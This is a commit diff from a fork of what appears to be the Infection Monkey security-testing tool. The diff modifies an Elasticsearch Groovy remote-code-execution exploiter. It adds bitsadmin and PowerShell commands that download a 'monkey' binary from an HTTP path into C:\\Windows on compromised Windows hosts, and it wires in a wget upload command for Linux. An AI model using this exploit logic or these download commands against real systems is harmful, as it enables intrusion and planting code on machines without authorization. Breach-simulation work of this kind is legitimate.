forked from p34709852/monkey
Commands tested and working on windows.
This commit is contained in:
parent
7e2cc86ab9
commit
a54eedec11
|
@ -6,13 +6,14 @@
|
|||
|
||||
import json
|
||||
import logging
|
||||
|
||||
import requests
|
||||
|
||||
from model import DROPPER_ARG
|
||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
||||
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||
from exploit.web_rce import WebRCE
|
||||
from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
|
||||
|
||||
import copy
|
||||
import re
|
||||
|
||||
__author__ = 'danielg'
|
||||
|
||||
|
@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
|
||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||
|
||||
# Both commands are prepared for use in future development
|
||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
|
||||
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
|
||||
def __init__(self, host):
|
||||
|
@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
if not vulnerable_urls:
|
||||
return False
|
||||
|
||||
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
|
||||
# Extra escaping required:
|
||||
config = copy.deepcopy(self._config)
|
||||
config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
|
||||
config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
|
||||
|
||||
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||
return True
|
||||
|
||||
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||
return False
|
||||
|
||||
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
|
||||
commands = {'windows': self.RDP_CMDLINE_HTTP,
|
||||
'linux': WGET_HTTP_UPLOAD}
|
||||
|
||||
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if data is not False and data['response'] == False:
|
||||
|
@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
payload = self.JAVA_CMD % command
|
||||
response = requests.get(url, data=payload)
|
||||
result = self.get_results(response)
|
||||
if not result: # not vulnerable
|
||||
if not result:
|
||||
return False
|
||||
return result[0]
|
||||
|
||||
|
|
Loading…
Reference in New Issue